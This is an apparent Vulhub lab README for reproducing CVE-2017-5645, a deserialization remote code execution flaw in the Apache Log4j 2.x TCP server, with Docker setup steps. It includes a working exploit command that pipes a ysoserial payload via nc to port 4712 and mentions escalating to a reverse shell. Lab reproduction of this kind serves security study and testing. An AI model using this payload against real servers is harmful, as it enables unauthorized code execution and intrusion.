Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
39 lines
1.5 KiB
Markdown
39 lines
1.5 KiB
Markdown
# Apache Log4j TCP Server Deserialization Remote Code Execution (CVE-2017-5645)
|
|
|
|
[中文版本(Chinese version)](README.zh-cn.md)
|
|
|
|
Apache Log4j is a logging library for Java that supports starting remote logging servers. A security vulnerability exists in versions 2.x before 2.8.2 of Apache Log4j TCP Server. Attackers can exploit this vulnerability to execute arbitrary code.
|
|
|
|
References:
|
|
|
|
- https://issues.apache.org/jira/browse/LOG4J2-1863
|
|
- https://github.com/pimps/CVE-2017-5645
|
|
|
|
## Environment Setup
|
|
|
|
Execute the following command to start a Log4j 2.8.1 TCP server:
|
|
|
|
```
|
|
docker compose up -d
|
|
```
|
|
|
|
After the environment starts, a TCP server will be opened on port 4712.
|
|
|
|
Note: Besides using Vulhub's docker image to set up the environment, we can directly start this TCP server from the command line after downloading the log4j jar files: `java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`, without needing to use Vulhub or write code.
|
|
|
|
## Vulnerability Reproduction
|
|
|
|
We use ysoserial to generate a payload, then send it directly to the `your-ip:4712` port.
|
|
|
|
```
|
|
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
|
|
```
|
|
|
|
Then execute `docker compose exec log4j bash` to enter the container, and you can see that /tmp/success has been successfully created:
|
|
|
|
|
|
|
|
Execute a [reverse shell command](http://www.jackson-t.ca/runtime-exec-payloads.html) to successfully get a shell:
|
|
|
|
|